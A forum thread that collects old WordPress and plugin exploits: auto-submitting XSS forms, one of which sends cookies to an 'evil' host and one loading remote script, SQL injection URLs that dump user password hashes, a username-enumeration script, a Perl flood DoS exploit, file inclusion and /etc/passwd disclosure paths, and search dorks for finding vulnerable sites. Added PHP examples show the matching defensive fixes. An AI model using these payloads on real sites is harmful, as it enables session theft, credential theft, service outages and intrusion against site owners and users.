WordPress vulnerability overview

Decide | Date: Wednesday, 14.11.2012, 10:21 | Message # 2
Colonel
Group: Administrators
Messages: 241
Status: Offline
simple PoC:
HTML code:
<html>
<head></head>
<body>
<form method="post" action="http://target/wordpress/wp-register.php">
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login" value='"><script>alert(1)</script>' />
<input type="hidden" name="user_email" id="user_email" value='"><script>alert(2)</script>' />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>

cookie theft PoC:
HTML code:
<html>
<head></head>
<body>
<form method="post" action="http://target/wordpress/wp-register.php#location='http://evil/?'+document.cookie">
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login" value="anyusername" />
<input type="hidden" name="user_email" id="user_email" value='"><script>eval(location.hash.substr(1))</script>' />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>

unrestricted script insertion from third-party site
(we prove we can inject ANY JS):
HTML code:
<html>
<head></head>
<body>
<form method="post" action="http://victim/wordpress/wp-register.php">
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login" value="test" />
<input type="hidden" name="user_email" id="user_email" value='"><SCRIPT src=http://evil/jsfile></SCRIPT>'>
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
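All three PoCs in this message work for the same reason: wp-register.php echoed the submitted user_login and user_email back into the value="" attribute of its own form without encoding. The PHP script below is an added example, not code from the post or from WordPress, showing the unencoded rendering next to the hardened one; it uses only htmlspecialchars() (inside WordPress the equivalent helper is esc_attr()) and the payload string is the one from the first PoC.

```php
<?php
// Added example, not code from the forum post or from WordPress: the
// registration page re-echoes user_login / user_email into the value=""
// attribute of its own form. Echoing the raw value lets a payload close the
// attribute and the tag; encoding for the attribute context does not.

declare(strict_types=1);

// Vulnerable rendering: the submitted value lands in the attribute verbatim.
function render_field_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '" />';
}

// Hardened rendering: encode for the HTML attribute context. ENT_QUOTES covers
// both quote styles; ENT_SUBSTITUTE replaces malformed UTF-8 instead of
// returning an empty string, which would silently drop the whole value.
// Inside WordPress the equivalent helper is esc_attr().
function render_field_safe(string $name, string $value): string
{
    $encoded = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="' . $name . '" value="' . $encoded . '" />';
}

// Constructed input: the payload used in the first PoC above.
$payload = '"><script>alert(1)</script>';

$unsafe = render_field_unsafe('user_login', $payload);
$safe   = render_field_safe('user_login', $payload);

echo "unsafe: $unsafe\n";
echo "safe:   $safe\n";

// Self-check: the hardened output must still be one <input> element and must
// not contain a script tag anywhere.
if (substr_count($unsafe, '<script>') !== 1
    || strpos($safe, '<script') !== false
    || strpos($safe, '&quot;&gt;&lt;script&gt;') === false) {
    fwrite(STDERR, "unexpected result\n");
    exit(1);
}
echo "output encoding check passed\n";
```

Run it with `php` from the command line. The same attribute-context encoding is the fix for the WP-ContactForm options page PoC later in this thread. The auto-submitting form the PoCs use to deliver the payload is a separate weakness (cross-site request forgery); for authenticated admin forms WordPress addresses it with nonces (wp_nonce_field() and check_admin_referer()), while an unauthenticated registration form can only be protected by encoding its output and rate-limiting submissions.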

Decide | Date: Wednesday, 14.11.2012, 10:22 | Message # 3
07 June 2007
Program: WordPress 2.2, possibly earlier versions
Danger: Medium
Exploit available: Yes
Description: The vulnerability allows a remote user to execute arbitrary SQL commands in the application's database.
The vulnerability exists because of insufficient validation of input data in the "wp.suggestCategories" method of the xmlrpc.php script. A remote user can execute arbitrary SQL commands in the application's database with a specially crafted request.
For this to work, user registration must be enabled on the site; the request is sent as POST only. Example request:
HTML code:
<methodCall>
<methodName>wp.suggestCategories</methodName>
<params>
<param><value>1</value></param>
<param><value>Здесь логин</value></param>
<param><value>Сдесь пароль</value></param>
<param><value>1</value></param>
<param><value>0 UNION SELECT USER()</value></param>
</params>
</methodCall>

Decide | Date: Wednesday, 14.11.2012, 10:22 | Message # 4
Wordpress 2.2 Username Enumeration
Code:
#!/bin/bash
# this script attacks a low-risk username enumeration vul
# on Wordpress 2.2 login page. Previous versions are
# possibly affected as well
#
# Note: you need curl [http://curl.haxx.se/download.html]
# installed on your system for this script to work.
#
# Adrian Pastor - http://www.gnucitizen.org/

if [ $# -ne 2 ]
then
  echo "need two parameters! correct syntax is:"
  echo "$0 <ip-or-hostname> <wordlist-filename>"
  exit 1
fi

for U in `cat $2`
do
  #echo $U
  if curl -s -d "log=$U&pwd=mypassword&wp-submit=Login+%C2%BB&redirect_to=" --url "http://$1/wordpress/wp-login.php" | grep -i 'Incorrect password' > /dev/null
  then
    echo "username found!: $U"   # print username found on screen
    echo $U >> $0.found          # save results to a file named after the script plus .found extension
  fi
done

Decide | Date: Wednesday, 14.11.2012, 10:22 | Message # 5
WordPress Security Whitepaper
Table of Contents
* Introduction
* Installing WordPress
  o Accessing your WordPress tables
  o Changing your WordPress Table Prefix
  o Before Installation
  o Manually Change
  o Through WP Prefix Table Changer
* Preparing the Blog
  o Changing your Admin Username
  o Create a new limited access user
* Hardening your WP Install
  o Restricting wp-content & wp-includes
  o Restricting wp-admin
  o Block all except your IP
  o Password Required - .htpasswd
  o The .htaccess file
  o The .htpasswd file
* MUSTHAVE Plugins
  o WPIDS - Detect Intrusions
  o WordPress Plugin Tracker – Are you updated?
  o WordPress Online Security Scanner
http://blogsecurity.net/projects/secure-wp-whitepaper.pdf

Decide | Date: Wednesday, 14.11.2012, 10:24 | Message # 6
WordPress PHP_Self Cross-Site Scripting Vulnerability
Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head>
<title>Wordpress XSS PoC</title>
</head>
<body id="main">
<form action="http://localhost/wp/wp-admin/theme-editor.php/'><img src=a onerror=document.forms[0].submit()><.php" method="post">
<p>
<textarea name="newcontent" rows="8" cols="40"><?php echo "Owned! " . date('F d, Y'); ?></textarea>
</p>
<p>
<input type="hidden" name="action" value="update" />
<input type="hidden" name="file" value="wp-content/themes/default/index.php" />
</p>
</form>
<script type="text/javascript">
// <![CDATA[
document.forms[0].submit();
// ]]>
</script>
</body>
</html>

Vulnerable URI:
Code:
/wp-admin/plugins.php?page=akismet-key-config

Vulnerable POST variable:
Code:
_wp_http_referer="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))</script>"

Decide | Date: Wednesday, 14.11.2012, 10:24 | Message # 7
runPHP Plugin
/wp-admin/post.php?action=edit&post=1/*SQLINJECTION*/%20AND%201′=0

WP <2.3
http://target/wp-admin/edit-post-rows.php?posts_columns[]=<script>alert(1)</script>

WordPress 2.0.1 Remote DoS Exploit
Code:
#!perl
#Greets to all omega-team members + h4cky0u[h4cky0u.org], lessMX6 and all dudes from #DevilDev ;)
#The exploit was tested on 10 machines but not all got flooded. Only 6/10 got crashed
use Socket;

if (@ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg; #no http://
for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++) #0_o :)
{
    $user="\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x66\x6f\x6f".$rand.$i; #you N33d t0 be l33t t0 s33 th!S !
    $data = "action=register&user_login=$user&user_email=$user\@matrix.org&submit=Register+%C2%BB";
    $len = length $data;
    $foo = "POST ".$dir."wp-register.php HTTP/1.1\r\n".
           "Accept: */*\r\n".
           "Accept-Language: en-gb\r\n".
           "Content-Type: application/x-www-form-urlencoded\r\n".
           "Accept-Encoding: gzip, deflate\r\n".
           "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
           "Host: $host\r\n".
           "Content-Length: $len\r\n".
           "Connection: Keep-Alive\r\n".
           "Cache-Control: no-cache\r\n\r\n".
           "$data";
    my $port = "80";
    my $proto = getprotobyname('tcp');
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
    connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
    send(SOCKET,"$foo", 0);
    syswrite STDOUT, "+";
}
#s33 if the server is down
print "\n\n";
system('ping $host');
sub usage {
    print "\n\t(W)ordpress 2.0.1 (R)emote (D)oS (E)xploit (B)y matrix_killer\n";
    print "\te-mail: matrix_k\@abv.bg\n";
    print "\tusage: \n";
    print "\t$0 <host> </dir/>\n";
    print "\tex: $0 127.0.0.1 /wordpress/\n";
    print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n";
    exit();
};

Decide | Date: Wednesday, 14.11.2012, 10:25 | Message # 8
Path disclosure
Code:
http://[target]/[path]/wp-content/plugins/akismet/akismet.php

WordPress Plugin BackUpWordPress <= 0.4.2b RFI Vulnerability
Code:
#Author: S.W.A.T.
#cont@ct: svvateam@yahoo.com
--------------------------------------------------------------------------------
Application : BackUpWordPress 0.4.2b
Download : http://wordpress.designpraxis.at/download/backupwordpress.zip
--------------------------------------------------------------------------------
Vuln : require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php";
--------------------------------------------------------------------------------
Exploit:
http://[target]/_path]/plugins/BackUp/Archive.php?bkpwp_plugin_path=Shl3?
http://[target]/_path]/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=Shl3?
http://[target]/_path]/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3?
http://[target]/_path]/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=Shl3?
& other Files & Folders In The [Archive] Folder
--------------------------------------------------------------------------------
Dork: "inurl:/plugins/BackUp"

Decide | Date: Wednesday, 14.11.2012, 10:25 | Message # 9
SQL Injection in WordPress 2.3.1
Code Author : Beenu Arora
Mail : beenudel1986 (at) gmail (dot) com [email concealed]
Application : WordPress (2.3.1)
Homepage: http://wordpress.org/
~~~~~~~~~~~~~~~~~~SQL Injection ~~~~~~~~~~~~
Vulnerable URL : http://localhost/path_to_wordpress/?feed=rss2&p=
Parameter : P
POC = http://localhost/path_to_wordpress/?feed=rss2&p=11/**/union/**/select/**/concat(user_password,char(100),username),2/**/from/**/wp_users/**/where/**/user_id=1/*
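The ?p= parameter here and the last wp.suggestCategories argument in message # 3 are both numeric values that were interpolated straight into a query, which is why a UNION appended to the number reaches the database. The PHP script below is an added example, not WordPress code, that contrasts that pattern with integer validation plus a bound parameter. It uses PDO with an in-memory SQLite database so it runs without MySQL (assumes the pdo_sqlite extension); the table names and rows are constructed stand-ins for wp_posts and wp_users.

```php
<?php
// Added example (not WordPress code): a numeric id interpolated into SQL
// versus the same lookup with validation and a bound parameter.
// Assumes PHP with the pdo_sqlite extension; the schema and rows are constructed.

declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Constructed tables standing in for wp_posts / wp_users.
$db->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, status TEXT)');
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pass TEXT)');
$db->exec("INSERT INTO posts VALUES (11, 'Hello world', 'publish')");
$db->exec("INSERT INTO users VALUES (1, 'admin', 'hash-placeholder')");

// Vulnerable: the id is interpolated, so anything after the number becomes SQL.
function post_title_unsafe(PDO $db, string $id): array
{
    return $db->query("SELECT title FROM posts WHERE id = $id")->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: (1) the id is validated as a plain integer before it reaches SQL,
// and (2) it is bound as a parameter, so it is never part of the statement
// text. WordPress exposes the same two steps as absint() and $wpdb->prepare().
function post_title_safe(PDO $db, string $id): array
{
    if (!ctype_digit($id)) {
        return [];                       // "11 UNION SELECT ..." is rejected here
    }
    $stmt = $db->prepare('SELECT title FROM posts WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed input in the shape of the post's payload (UNION of a second table).
$payload = '11 UNION SELECT pass FROM users WHERE id = 1';

$leaked = post_title_unsafe($db, $payload);   // two rows: the title and the hash
$safe   = post_title_safe($db, $payload);     // rejected: empty result
$normal = post_title_safe($db, '11');         // legitimate lookup still works

printf("unsafe rows: %s\n", implode(', ', $leaked));
printf("safe rows:   %s\n", implode(', ', $safe));
printf("normal rows: %s\n", implode(', ', $normal));

if (count($leaked) !== 2 || $safe !== [] || $normal !== ['Hello world']) {
    fwrite(STDERR, "unexpected result\n");
    exit(1);
}
echo "parameterised lookup check passed\n";
```

The validation step matters on its own: even with a prepared statement, a handler that accepts arbitrary strings for an id is a sign that the value is also being used unquoted somewhere else (a redirect, a cache key, a log line), so rejecting anything that is not a digit string at the boundary removes the whole class of follow-on bugs.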

Decide | Date: Wednesday, 14.11.2012, 10:34 | Message # 10
WordPress Charset SQL Injection Vulnerability
Insufficient filtering when the database uses the GBK charset leads to SQL injection. (Write-up of the vulnerability on Antichat: https://forum.antichat.ru/thread62109.html)
Exploit: http://localhost/wordpre....,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23
http://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html
Code:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=== WordPress Charset SQL Injection Vulnerability ===
Release date: 2007-12-10
Last modified: 2007-12-10
Source: Abel Cheung
Affected version: WordPress escape($gpc); }
Finally, escape() method belongs to wp-includes/wp-db.php:
function escape($string) {
    return addslashes( $string ); // Disable rest for now, causing problems
    ......
}
3. Proof of concept
a. After WordPress installation, modify wp-config.php to make sure it uses certain character set for database connection (Big5 can also be used):
define('DB_CHARSET', 'GBK');
b. http://localhost/wordpre....,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23
4. Workaround
Note: This vulnerability only exists for database queries performed using certain character sets. For databases created in most other character sets no remedy is needed.
a. It is recommended to convert WordPress database to use character sets not vulnerable to such SQL exploit. One such charset is UTF-8, which does not use backslash ('\') as part of character and it supports various languages.
b. Alternatively, edit WordPress theme to remove search capability.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: http://firegpg.tuxfamily.org

iD8DBQFHXVXGQVLh8cZxhv8RAgjgAKDwvrrO6hJbnV0/VFah5W+i8grYcwCgzyCT
5RKJG+zo/mktmRU3v1IfmXE=
=2okr
-----END PGP SIGNATURE-----
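The advisory's point is that addslashes() works on bytes while GBK characters span two bytes, so the backslash it inserts can be swallowed into a multibyte character. The PHP script below is an added example, not code from the advisory or from WordPress, that makes this visible with a two-byte constructed input and shows the check a defender can add in front of any escaping routine: refuse input that is not well-formed in the connection charset. It needs PHP with the mbstring extension and touches no database.

```php
<?php
// Added example (not WordPress code): why addslashes() is not a safe escape
// under a multibyte charset such as GBK, plus a well-formedness check.
// Assumes the mbstring extension; the input bytes are constructed.

declare(strict_types=1);

// Constructed two-byte input: 0xBF is a valid GBK lead byte, 0x27 is a quote.
$input = "\xBF\x27";

// addslashes() works on bytes and inserts 0x5C before the quote.
$escaped = addslashes($input);                // bytes: BF 5C 27

// Under GBK, 0xBF 0x5C is itself a complete character, so the quote that
// follows it is no longer escaped. Under UTF-8 the lead byte is simply invalid,
// which is why the advisory recommends UTF-8.
$gbkChar = substr($escaped, 0, 2);
printf("escaped bytes: %s\n", bin2hex($escaped));
printf("BF5C is a valid GBK character: %s\n", mb_check_encoding($gbkChar, 'GBK') ? 'yes' : 'no');
printf("BF5C is valid UTF-8: %s\n", mb_check_encoding($gbkChar, 'UTF-8') ? 'yes' : 'no');

// Defensive check: reject input that is not well-formed in the connection
// charset before it reaches an escape routine. The raw input above fails,
// because 0x27 is not a legal GBK trail byte.
function is_well_formed(string $s, string $charset): bool
{
    return mb_check_encoding($s, $charset);
}

printf("raw input is well-formed GBK: %s\n", is_well_formed($input, 'GBK') ? 'yes' : 'no');

if (is_well_formed($input, 'GBK') || !is_well_formed($gbkChar, 'GBK')) {
    fwrite(STDERR, "unexpected result\n");
    exit(1);
}
echo "charset check passed\n";
```

The durable fix is the one the linked ilia.ws article argues for: bound parameters, or at least an escape routine that knows the connection charset (mysqli_set_charset() followed by mysqli_real_escape_string(), or the charset= entry in a PDO MySQL DSN, rather than a SET NAMES query the driver cannot see). The is_well_formed() check is a cheap extra layer in front of either.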

Decide | Date: Wednesday, 14.11.2012, 10:35 | Message # 11
Wordpress 2.3.1 - Broken Access Control is_admin()
Obtaining admin privileges without the password.
Code:
By Michael Brooks
Vulnerability: Broken Access Control
Homepage: http://wordpress.org/download
Software: Wordpress
Version affected: 2.3.1 (Latest at the time of writing)
The impact of the flaw is that an attacker can read posts while they are still drafts. This is an ability that only the administrator should have. Imagine a stranger being able to read the news before it is published. Or perhaps a spam-blog harvesting posts before they are published.
This flaw is because Wordpress is trusting the $_SERVER['REQUEST_URI'] global variable. Manipulation of $_SERVER['REQUEST_URI'] has led to many XSS flaws. Although an attacker shouldn't be able to control all $_SERVER variables, none of them should be trusted.
exploit:
http://localhost/wordpress/'wp-admin/
This will cause both $_SERVER['REQUEST_URI'] and $_SERVER['PHP_SELF'] to contain the value: http://localhost/wordpress/'wp-admin/
Vulnerable function:
line 34, in ./wp-includes/query.php.
function is_admin () {
global $wp_query;
return ($wp_query->is_admin || (stripos($_SERVER['REQUEST_URI'], 'wp-admin/') !== false));
}
The same flaw is duplicated again on line 645 of the same file.
This url: http://localhost/wordpress/'wp-admin/ will cause the is_admin() function to return true. This flaw works regardless of regis
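The is_admin() above turns a substring search on REQUEST_URI into a privilege decision, so any path that merely contains "wp-admin/" passes. The PHP script below is an added example, not the advisory's or WordPress's code. It shows a path-locality test that compares normalised segments instead of searching the raw URI, and the approach later WordPress releases took instead, where the admin entry scripts define a WP_ADMIN constant and is_admin() checks that constant rather than anything the client sent. The request strings are constructed; the first is the advisory's own payload.

```php
<?php
// Added example (not WordPress code): deciding "is this request inside the
// admin area" without trusting a substring match on REQUEST_URI.

declare(strict_types=1);

// Step 1: a pure path check. Parse the path, split it into segments, and
// require the admin directory to match a whole prefix of those segments.
function path_is_under(string $requestUri, string $adminDir): bool
{
    $path = parse_url($requestUri, PHP_URL_PATH);
    if (!is_string($path)) {
        return false;
    }
    $segments = array_values(array_filter(explode('/', $path), 'strlen'));
    $admin    = array_values(array_filter(explode('/', $adminDir), 'strlen'));
    return array_slice($segments, 0, count($admin)) === $admin;
}

// Step 2: the signal that actually belongs in is_admin(). The admin entry
// scripts define WP_ADMIN before loading the core, so the flag records which
// code path ran, not what the client typed into the URL.
function is_admin_context(): bool
{
    return defined('WP_ADMIN') && WP_ADMIN === true;
}

// Constructed requests: the advisory's payload, a real admin URL, and a
// front-end URL that only mentions wp-admin/ in its query string.
$cases = [
    "/wordpress/'wp-admin/"                        => false,
    '/wordpress/wp-admin/edit.php'                 => true,
    '/wordpress/?redirect_to=/wordpress/wp-admin/' => false,
];
foreach ($cases as $uri => $expected) {
    $got = path_is_under($uri, '/wordpress/wp-admin');
    printf("%-50s %s\n", $uri, $got ? 'admin path' : 'not admin path');
    if ($got !== $expected) {
        fwrite(STDERR, "unexpected result for $uri\n");
        exit(1);
    }
}

// With WP_ADMIN undefined nothing is admin, whatever the URI says.
if (is_admin_context() !== false) {
    fwrite(STDERR, "unexpected admin context\n");
    exit(1);
}
echo "admin-context check passed\n";
```

Even the fixed function only answers "did the admin bootstrap run"; it says nothing about who is logged in. The draft-reading decision the advisory describes belongs to a capability check such as current_user_can(), with is_admin() used for presentation choices only.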

Decide | Date: Wednesday, 14.11.2012, 10:35 | Message # 12
Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
D.Script : http://downloads.wordpress.org/plugin/pictpress.release-0.91.zip
Vuln Code :
In Line 5,6,7,8 :
$path = $_GET['path'];
$size = $_GET['size'];
$base = dirname(__FILE__) . "/..";
$cache = "$base/cache/$size/$path";
In Line 22 :
readfile($cache);
POC :
/wp-content/plugins/pictpress/resize.php?size=../../../../../../../../../../&path=/etc/passwd%00

Decide | Date: Wednesday, 14.11.2012, 10:35 | Message # 13
For attacking admin only (at options page):
1
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit © 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_email" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>

Decide | Date: Wednesday, 14.11.2012, 10:36 | Message # 14
directory traversal vulnerabilities in WP 2.0.11 (win only)
PHP code:
function validate_file(..)
    if (false !== strpos($file, './'))
Code:
Proof of concept:
http://site/wp-admin/index.php?page=\..\..\.htaccess
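Both the PictPress resize.php in message # 12 (user-controlled segments concatenated into a readfile() path, with a %00 to cut off the suffix) and the validate_file() check here (which only looks for "./" and so misses the Windows "\..\" form) fail the same way: they inspect the raw string instead of constraining where the resolved path can end up. The PHP function below is an added example, not the plugin's or WordPress's code, that covers both cases with one lexical check: it rejects NUL bytes, treats backslash like slash, refuses any ".." segment, and confirms the result stays under the base directory. The base path and inputs are constructed; the first two inputs are the thread's own PoCs.

```php
<?php
// Added example (not the plugin's or WordPress's code): one containment check
// for a path built from request parameters. Purely lexical, so it needs no
// filesystem access and also works for cache files that do not exist yet.

declare(strict_types=1);

/**
 * Return the path of $relative inside $baseDir, or null if it is not safe.
 */
function resolve_inside(string $baseDir, string $relative): ?string
{
    // 1. A NUL byte truncates C-level file names (the "%00" in the PoC).
    if (strpos($relative, "\0") !== false) {
        return null;
    }
    // 2. Normalise separators so "\..\" is seen as "../" (the Windows bypass).
    $normalised = str_replace('\\', '/', $relative);
    // 3. No absolute paths or drive letters: the caller chose the base.
    if ($normalised === '' || $normalised[0] === '/' || preg_match('~^[A-Za-z]:~', $normalised)) {
        return null;
    }
    // 4. Walk the segments; "." is dropped, ".." is refused rather than resolved.
    $clean = [];
    foreach (explode('/', $normalised) as $segment) {
        if ($segment === '' || $segment === '.') {
            continue;
        }
        if ($segment === '..') {
            return null;
        }
        $clean[] = $segment;
    }
    if ($clean === []) {
        return null;
    }
    $base = rtrim(str_replace('\\', '/', $baseDir), '/');
    $full = $base . '/' . implode('/', $clean);
    // 5. Belt and braces: the result must still start with the base directory.
    return strncmp($full, $base . '/', strlen($base) + 1) === 0 ? $full : null;
}

// Constructed inputs: the two PoCs from the thread, plus a legitimate request.
$base  = '/var/www/wordpress/wp-content/plugins/pictpress/cache';
$cases = [
    ['../../../../../../../../../../', "/etc/passwd\0"],  // PictPress PoC
    ['', '\\..\\..\\.htaccess'],                          // validate_file PoC
    ['thumb', 'holiday/photo.jpg'],                       // legitimate
];
foreach ($cases as [$size, $path]) {
    $result = resolve_inside($base, ($size === '' ? '' : $size . '/') . $path);
    printf("%-45s => %s\n", addcslashes($size . '/' . $path, "\0"), $result ?? 'REJECTED');
}

if (resolve_inside($base, '../x') !== null
    || resolve_inside($base, "a\0b") !== null
    || resolve_inside($base, '\\..\\.htaccess') !== null
    || resolve_inside($base, 'thumb/holiday/photo.jpg') !== $base . '/thumb/holiday/photo.jpg') {
    fwrite(STDERR, "unexpected result\n");
    exit(1);
}
echo "path containment check passed\n";
```

Where the file is known to exist already, a realpath() of the candidate compared against realpath() of the base adds protection against symlinks that a lexical check cannot see; the two checks complement each other rather than replace one another. The same rule applies to the BackUpWordPress include in message # 8: a path that decides what gets included or read should be derived from __DIR__ and an allow-list, never from request data.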

Decide | Date: Wednesday, 14.11.2012, 10:40 | Message # 15
Wordpress Plugin Wp-FileManager 1.2 Remote Upload Vulnerability
The file manager is located here:
Code:
http://[TARGEt]/[path_wordpress]/wp-content/plugins/wp-filemanager/ajaxfilemanager/ajaxfilemanager.php
After uploading, you will find the script in this directory:
Code:
http://[TARGEt]/[path_wordpress]/uploaded/[evil].(php)
Search query:
Code:
plugins/wp-filemanager/ inurl:/wp-filemanager/